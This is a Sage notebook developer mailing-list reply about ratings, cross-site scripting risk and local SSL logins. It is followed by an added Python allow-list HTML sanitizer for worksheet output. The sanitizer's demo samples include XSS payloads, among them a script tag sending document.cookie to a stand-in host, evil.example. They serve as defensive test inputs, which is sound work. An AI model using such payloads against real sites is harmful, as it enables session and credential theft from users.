> > Some very minor issues, IMHO:
> > * I assume 4.0 is the highest rating? As I start counting at zero I would
> > like to rate a notebook with 0.0, i.e. claim it is useless. 1.0 is
> > something, 0.0 is crap.
>
> I can add that.  I was thinking of also adding a comment field, so you can
> explain why said worksheet is crap.

Sounds good.

> > * as far as I can tell, there is no prevention of cross-site scripting
> > attacks implemented yet. Is this a planned feature?
>
> No plans.  Could you make some plans?
>
> This is only an issue when the notebook users are completely random
> and open.  I believe that in the long run most
> notebook usage will be by users who are trusted and have specifically
> been given accounts (e.g., students at a specific university in a course),
> which is why getting SSL authentication and
> encryption up and running by default was so important.

If I could run arbitrary javascript on my teacher's computer that would still 
be a security breach, so even though the authentication/encryption helps a 
lot, it doesn't prevent this from happening/being a threat.

> Anonymous free open notebooks will probably only be
> run by some crazy folks (such as me!!) until they get in trouble with
> their universities...  It's just completely giving away nontrivial
> computing resources.

XSS attacks (http://en.wikipedia.org/wiki/XSS) are not about the server:
The attack is to inject javascript code into a notebook cell and thus have
another user's browser perform evil things like sending a cookie
around/browsing some evil website etc. So it doesn't really matter who runs
the website as long as people trust the website to visit it.

The only solution is to prevent HTML output under direct user control. This is 
one reason why Wikis come with their own markup languages. So for example all 
output gets filtered through a module which translates MoinMoin Wiki markup 
to HTML (like the MoinMoin wiki does) and filters out every other HTML.

> > * Most websites which allow users to publish their stuff have a "report
> > this as spam/offensive" button, this could be useful.
>
> That's a good idea.
>
> > * How come that 'was' edited my published notebook last according to
> > https://sage.math.washington.edu:8102/home/pub/14/ . Is this was' admin
> > status, a bug, a feature?
>
> Bug.  It looks right here:
>   https://sage.math.washington.edu:8102/home/pub/
> I just need to make sure the "edited by" line is taken from the same place
> (same function call) in both cases.
>
> > But again, overall it is just amazingly cool,
>
> Cool, I'm glad you appreciate it.  It was very very hard work to write
> last week.
>
> I will be working a lot on polishing and improving it in little ways this
> week. One big problem is that the username is being set by the server as a
> global variable (in a file twist.py)  -- this was a hack to get things
> going, and of course
> is fine when testing as a single user.  But this morning there were about
> THIRTY high school students in my workshop pounding the server at once, and
> this silly hack certainly didn't hold up under multiple concurrent requests
> (!). Fixing that
> is first on my list.
>
> Thanks for all your feedback.
>
> By the way, as always, everything anyone should need to switch to the old
> notebook is in
>    http://sage.math.washington.edu/home/was/twisted/
>
> Automigration of old worksheets is implemented, and might even work.
> Right after migrating, you should delete the sage_notebook/worksheets
> directory manually.  You do migration just by running the new notebook;
> it detects that the notebook is in the old format and updates everything.
> The screen goes blank for a few seconds, but don't panic.
>
> I've set the server up so that even locally if you type "notebook()" to
> run the notebook on localhost, then it uses SSL and you have to
> type a password.   I did this, since my assumption is that if I don't do
> this, then anybody else who logs into your computer could hose your
> account.  Is this correct?

Yes. As the local notebook listens on 127.0.0.1 it accepts connections from 
everyone able to connect to 127.0.0.1.

Martin

-- 
name: Martin Albrecht
_pgp: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x8EF0DC99
_www: http://www.informatik.uni-bremen.de/~malb
_jab: [EMAIL PROTECTED]
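
The filtering approach described in the reply above (translate a restricted markup to HTML and drop every other tag, while plain computation output is never interpreted as HTML), as an added example that is not part of this thread or of the Sage notebook code. The tag set, the attribute allow-list, the URL scheme list and the function names are assumptions for illustration; the page only says that user-controlled HTML must be filtered.

```python
"""Allow-list HTML filter for worksheet output (added example, not Sage code).

Two rules, matching the reasoning in the thread:
  * output of a computation is text and is always escaped, never rendered;
  * user-written markup passes an allow-list: unknown tags and all event or
    style attributes are dropped, and links may only use harmless schemes.
"""
from html import escape
from html.parser import HTMLParser

# Assumed allow-list: formatting tags a worksheet author might reasonably use.
ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br", "ul", "ol", "li",
                "pre", "code", "a"}
# Only <a href> is allowed to carry an attribute; onclick, style, etc. never survive.
ALLOWED_ATTRS = {"a": {"href"}}
# javascript: and data: URLs are rejected because they are not in this list.
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")


class AllowListFilter(HTMLParser):
    """Rebuilds a fragment from scratch, keeping only allow-listed pieces."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []         # pieces of the sanitized fragment
        self.open_tags = []   # kept tags still awaiting a close tag

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return            # tag is dropped, its text content is still kept
        safe_attrs = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue      # drops onclick=, onerror=, style=, ...
            value = (value or "").strip()
            if name == "href" and not value.lower().startswith(SAFE_URL_SCHEMES):
                continue      # drops javascript:, data:, vbscript: links
            safe_attrs.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(safe_attrs)))
        if tag != "br":
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag not in self.open_tags:
            return            # stray or disallowed close tag: ignore it
        while self.open_tags:  # close anything left open inside the tag
            opened = self.open_tags.pop()
            self.out.append("</%s>" % opened)
            if opened == tag:
                break

    def handle_data(self, data):
        # Text (including <script> bodies, which the parser hands over as
        # data) is always escaped, so it can never become markup.
        self.out.append(escape(data))

    # Comments, doctypes and processing instructions carry nothing a
    # worksheet needs, so they are discarded.
    def handle_comment(self, data):
        pass

    def handle_decl(self, decl):
        pass

    def handle_pi(self, data):
        pass

    def unknown_decl(self, data):
        pass

    def result(self):
        while self.open_tags:  # close tags the author left unclosed
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitize_html(fragment):
    """Return an allow-listed version of user-written HTML."""
    parser = AllowListFilter()
    parser.feed(fragment)
    parser.close()
    return parser.result()


def render_cell_output(text):
    """Computation output is data, not markup: escape it unconditionally."""
    return escape(text)


if __name__ == "__main__":
    # Constructed sample inputs, the kind of cell text the thread worries about.
    samples = [
        '<b onclick="steal()">hello</b>',
        '<script>document.location="http://evil.example/?c="+document.cookie</script>',
        '<a href="javascript:alert(1)">click</a>',
        '<img src=x onerror=alert(1)>',
        '<p>unclosed <i>markup',
    ]
    for sample in samples:
        print(repr(sample), "->", repr(sanitize_html(sample)))
    print(repr(render_cell_output("<script>alert(1)</script>")))
```

The filter is an allow-list rather than a block-list on purpose: a block-list has to anticipate every tag and attribute a browser might execute, while an allow-list only has to name the handful a worksheet author needs, and anything new or unexpected falls through as escaped text.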

